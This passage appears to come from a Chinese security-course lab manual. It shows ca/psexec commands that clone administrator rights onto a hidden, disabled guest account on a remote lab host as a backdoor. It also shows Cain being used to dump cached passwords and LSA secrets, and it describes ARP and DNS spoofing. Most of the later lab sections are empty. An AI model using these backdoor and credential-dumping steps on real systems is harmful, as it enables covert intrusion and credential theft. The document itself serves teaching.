一、实验准备
1、登陆Windows xp 虚拟机
打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
二、CA和CCA的使用
1、ca和cca及psexec都是在命令行下运行的工具,需要通过“开始”→“运行”,输入“cmd”,然后切换到其目录,然后dir可以查看ca cca psexec。如下图所示。
2、ca克隆帐号
首先需要获取远程主机/服务器的管理员权限,假设我们已得到目标主机(ip 192.168.41.207)的管理权限,目标主机的用户名为:administrator,密码为:51e329在ms-dos中键入命令:ca.exe \192.168.41.207administrator“51e329”guest 51e329命令表示ip地址为192.168.41.207的远程主机中,将guest账号克隆成管理员权限的账号,克隆后的guest帐户密码为51e329如下图所示。
3、为了让“后门账号”更加隐蔽。不会被管理员轻易发现,还需要把该guest账号禁用,这样一来,便可以在以后的入侵过程中使用该被进制的guest账号实现远程控制了。过程:首先在本地ms-dos中键入“psexec \192.168.41.207-u administrator-p“51e329”cmd.exe”获得远程主机的命令行,使用psexec\192.168.41.207-u administrator -p “51e329” cmd.exe点击“agree”,如下图所示。
使用net user guest /active:no命令来禁用本地guest账号,如下图所示。(这里只是说明如何禁用本地账号,但是为了后面实验步骤的继续,也即如果在此步禁用了,会导致后面实验步骤的失败,所以在禁用后,请使用net user guest /active:yes开启。)
4、使用cca查看帐号是否被克隆在上面的步骤中已经成功的把administrator的权限成功的克隆到了guest账号上了,下面就来验证这一克隆账号的结果,我们使用与ca配套的工具cca来验证。过程如下:首先输入“exit”退回到本地命令行中,然后在本地ms-dos中键入:cca \192.168.41.207administrator 51e329命令查看远程主机192.168.41.207上的administrator账号是否被克隆,输入后按回车键执行,如下图所示。
由此可见该被禁用的guest账号可以用来实现远程登陆。
实验完成。
3、分析和思考
1.简单克隆和完全克隆的原理和具体方法分别是什么。
2.把guest帐号禁用的目的是什么。
实验23、
1、实验介绍
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
实验目标
- 掌握cain在windows下的使用方法。
预备知识
日常操作中许多密码会存储到本机的缓存中,如上网时保存的密码,登录某些服务时的密码,这些密码都是在加密后存储在本机上的,使用某些软件读取并解密后可以还原为真实的用户名和密码。同时,使用网络嗅探捕获数据包也可以获得密码,如登录ftp的数据包被获取,通过一定程序读取数据包中的内容就可以得到ftp的登录用户名和密码。
网络主机之间进行数据传输时需要知道对方主机的mac地址,它会首先查看本机的mac地址缓存表,如果存在就可以直接使用,如果不存在就会通过网络广播得到对方主机的mac地址,mac地址表一段时间不用就会过期,过期的mac地址会从本机的mac地址表中删除。我们就可以通过伪造mac地址进行arp欺骗,使主机得到一个假的mac地址,从而使数据不能正确地传送。同样,internet上的dns也和mac地址的缓存机制类似,我们也可以伪造dns进行dns欺骗。
我们可以使用cain进行密码**、arp欺骗、dns欺骗等,通过嗅探功能得到相关的密码,对密文进行暴力**,通过路由探测、主机信息枚举等得到目标主机的敏感信息等。
cain是著名的windows平台的口令恢复工具,它能通过网络嗅探很容易地恢复多种口令,能够使用字典**加密的口令,暴力口令**,捕获voip电话的谈话内容,解码加密后的口令,获取无线网络**,恢复缓存的口令,分析路由协议等。它还可以远程**,可以挂字典以及暴力**,其sniffer功能极其强大,几乎可以明文捕获一切帐号口令,包括ftp、http、imap、pop3、smb、telnet、vnc、tds、smtp、mskerb5-preauth、msn、radius-keys、radius-users、icq、ike aggressive mode pre-shared keys authentications等。
2、实验步骤
一、实验准备
1、登陆Windows xp 虚拟机
打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
3、进入c:\tools\AHCJ188\cain目录中,双击“Cain.exe”运行程序。如下图所示。
4、运行“cain.exe”后,可以看到八个选项卡:“Decoders”、“Network”、“Sniffer”、“Cracker”、“Traceroute”、“CCDU”、“Wireless”以及“Query”。如下图所示。
二、Decoders选项卡
1、选项卡主要对本机内存储的密码信息进行解码显示,点击“protected storage”,然后点击工具栏上的蓝色的“+”按钮,cain会将本机所有的敏感信息显示出来。如下图所示。
2、选中“Lsa secrets”,点击工具栏上面的“+”按钮,在弹出的对话框中选择“local system”,表示从本机中读取。如下图所示。
3、分析和思考
1.Cain的主要功能是什么。
2.日常操作中许多密码会存储到本机的缓存中吗?
实验24、
1、实验介绍
2、实验步骤
https://xpro-adl.91ctf.com/teach/courseLearn?type=experiment&id=135&s=0
3、分析和思考
实验25、
1、实验介绍
2、实验步骤
3、分析和思考
实验26、
1、实验介绍
2、实验步骤
3、分析和思考
实验27、
1、实验介绍
2、实验步骤
3、分析和思考
实验28、
1、实验介绍
2、实验步骤
3、分析和思考
实验29、
1、实验介绍
2、实验步骤
3、分析和思考
实验30、
1、实验介绍
2、实验步骤
3、分析和思考
实验31、
1、实验介绍
2、实验步骤
3、分析和思考
实验32、
1、实验介绍
2、实验步骤
3、分析和思考
实验33、
1、实验介绍
2、实验步骤
3、分析和思考